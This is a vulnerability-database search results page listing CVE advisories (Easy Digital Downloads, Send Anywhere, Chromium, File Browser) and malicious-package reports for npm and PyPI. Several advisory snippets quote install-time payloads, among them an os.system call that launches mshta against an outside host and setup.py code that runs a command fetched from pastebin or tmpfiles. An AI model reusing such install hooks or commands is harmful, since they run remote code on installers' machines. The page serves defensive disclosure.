Lucene search
+L

3980 matches found

NVD
NVD
added 2026/06/15 9:16 p.m.8 views

CVE-2026-39503

Unauthenticated Broken Access Control in Easy Digital Downloads = 3.6.5 versions...

7.5CVSS0.00246EPSS
Exploits0References1
CVE
CVE
added 2026/06/15 8:17 p.m.13 views

CVE-2026-39503

CVE-2026-39503 affects the WordPress plugin Easy Digital Downloads (versions

7.5CVSS5.1AI score0.00246EPSS
Exploits0References1
Cvelist
Cvelist
added 2026/06/15 8:17 p.m.33 views

CVE-2026-39503 WordPress Easy Digital Downloads plugin <= 3.6.5 - Broken Access Control vulnerability

Unauthenticated Broken Access Control in Easy Digital Downloads = 3.6.5 versions...

7.5CVSS0.00246EPSS
Exploits0References1
NVD
NVD
added 2026/06/15 8:16 p.m.10 views

CVE-2025-68713

An issue was discovered in Rakuten Send Anywhere File Transfer for Android com.estmob.android.sendanywhere 23.2.9. The vulnerability allows untrusted applications with no permissions to force arbitrary file downloads into the app's scoped storage. The resulting files appear in the application's...

8CVSS0.00284EPSS
Exploits0References1
OSV
OSV
added 2026/06/15 5:30 p.m.16 views

MAL-2026-5799 Malicious code in boardflow (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f9d5c1524281430272215f48a90b957cf08f76dcb9954cb73945421dff358eb2 package.json declares preinstall: node install.js, which fires automatically on npm install. install.js is heavily obfuscated obfuscator.io...

5.8AI score
Exploits0References9
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/15 5:24 p.m.12 views

Malicious code in testpgagent (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c3b12f57a72964e978d195ad7c3a9f6fe560ad1990d55bb1b4053d88a6bb9c4f On pip install, setup.py line 19 calls execbase64.b64decode... whose decoded body is import os; os.system'cmd /c "mshta http://fixars.top"'. This...

6.3AI score
Exploits0References7
OSV
OSV
added 2026/06/15 4:23 p.m.11 views

MAL-2026-5797 Malicious code in neurodrift (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 1b632fa784b6125daaba0e4a2b9e775bc4fec21c7d41127b887f9dfe6e873ce0 During installation, the code attempts to download and start a malicious executable. Likely related to 2025-08-raknet-testing-package. --- Category: MALICIOUS ...

5.5AI score
Exploits0References5
OSV
OSV
added 2026/06/15 4:17 p.m.12 views

MAL-2026-5796 Malicious code in llmfree (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 e779d2361b98c48a801fb29dedf2931f94b4264314d074895e14482ad0d5a15f During installation, the code attempts to download and start a malicious executable. Likely related to 2025-08-raknet-testing-package. --- Category: MALICIOUS ...

5.5AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/15 11:43 a.m.15 views

Malicious code in fastgptmini (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4da10d62527ca4b69f4458b6a01c77f01af42c5a1631d5cc6f207070d1ade20d setup.py fetches an opaque file from https://tmpfiles.org/dl/wJwhUXDhUK6M/zvgfsj.txt an anonymous, throwaway file-sharing host during pip install,...

5.7AI score
Exploits0References7
Cvelist
Cvelist
added 2026/06/15 12:0 a.m.46 views

CVE-2025-68713

An issue was discovered in Rakuten Send Anywhere File Transfer for Android com.estmob.android.sendanywhere 23.2.9. The vulnerability allows untrusted applications with no permissions to force arbitrary file downloads into the app's scoped storage. The resulting files appear in the application's...

0.00284EPSS
Exploits0References1
CVE
CVE
added 2026/06/15 12:0 a.m.20 views

CVE-2025-68713

Rakuten Send Anywhere for Android (com.estmob.android.sendanywhere, version 23.2.9) is affected. A vulnerability allows untrusted applications with no permissions to trigger arbitrary file downloads into the app’s scoped storage, with downloaded items appearing in the app’s trusted Received inter...

8CVSS6.1AI score0.00284EPSS
Exploits0References1
Positive Technologies
Positive Technologies
added 2026/06/15 12:0 a.m.15 views

PT-2026-49282

Name of the Vulnerable Software and Affected Versions Rakuten Send Anywhere File Transfer for Android version 23.2.9 Description An issue in the application allows untrusted apps without permissions to force arbitrary file downloads into the app's scoped storage. These files then appear in the...

8CVSS6.5AI score0.00284EPSS
Exploits0References3
Positive Technologies
Positive Technologies
added 2026/06/15 12:0 a.m.12 views

PT-2026-49388

Unauthenticated Broken Access Control in Easy Digital Downloads = 3.6.5 versions...

7.5CVSS5.1AI score0.00246EPSS
Exploits0References2
OSV
OSV
added 2026/06/14 2:37 p.m.17 views

MAL-2026-5773 Malicious code in generatellm (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 31201af7035560c0798b46e67a374b9526a7e8ed2f856235e5eb0438d1a8d080 GenerateLLM 2.23 is a hollow PyPI package placeholder metadata, no functional code under src/, only an egg-info directory whose entire payload is an...

6.7AI score
Exploits0References6
OSV
OSV
added 2026/06/14 8:53 a.m.12 views

MAL-2026-5769 Malicious code in ezllmgen (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d9ad551d9ee9ad2f3c29daab0377c3e52289324e938e28a3b58d71c60e8e15e8 setup.py downloads the first line of https://pastebin.com/raw/yBcUM1QB via urllib and passes it directly to os.systemf'cmd /c "cmdpastebin"' during...

5.5AI score
Exploits0References6
OSV
OSV
added 2026/06/12 9:53 p.m.8 views

GHSA-GXJX-7M74-HCQ8 File Browser: FilePath traversal in download-as-zip/tar via Windows-style backslash separators in stored filenames

Summary filebrowser builds the download-as-zip / download-as-tar archive entry names with filepath.ToSlash, which on a Linux host is a no-op for backslashes \ is only a path separator on Windows. A file whose name contains Windows-style traversal ......\evil.txt is accepted by the resource...

6.2CVSS5.7AI score0.00189EPSS
Exploits0References4
OSV
OSV
added 2026/06/11 7:11 p.m.3 views

CVE-2026-53781 Summarize < 0.17.0 Disk Exhaustion via Uncapped Media Download

Summarize before 0.17.0 contains a resource exhaustion vulnerability that allows remote attackers to cause disk exhaustion by serving media responses that bypass the enforced size limit through missing or misreported Content-Length headers, chunked transfer encoding, or failed HEAD requests...

5.3CVSS6AI score0.00329EPSS
Exploits0References7
HackRead
HackRead
added 2026/06/08 4:56 p.m.21 views

Hackers Clone Ghidra, dnSpy and Other Tool Sites to Spread Malware

Hackers are cloning Ghidra, dnSpy, ILSpy and other free tool sites to spread Malware like RemusStealer, crypto clippers and loaders through fake downloads...

5.5AI score
Exploits0
RedhatCVE
RedhatCVE
added 2026/06/07 5:17 a.m.9 views

CVE-2026-11243

An incorrect security ui flaw was found in the Downloads component of the Chromium browser. Upstream bugs: https://code.google.com/p/chromium/issues/detail?id=497394061...

5.4CVSS5.4AI score0.00149EPSS
Exploits0References5
RedhatCVE
RedhatCVE
added 2026/06/07 5:7 a.m.11 views

CVE-2026-11158

An insufficient validation of untrusted input flaw was found in the Downloads component of the Chromium browser. Upstream bugs: https://code.google.com/p/chromium/issues/detail?id=501844153...

8.8CVSS5.4AI score0.00083EPSS
Exploits0References5
Rows per page
Query Builder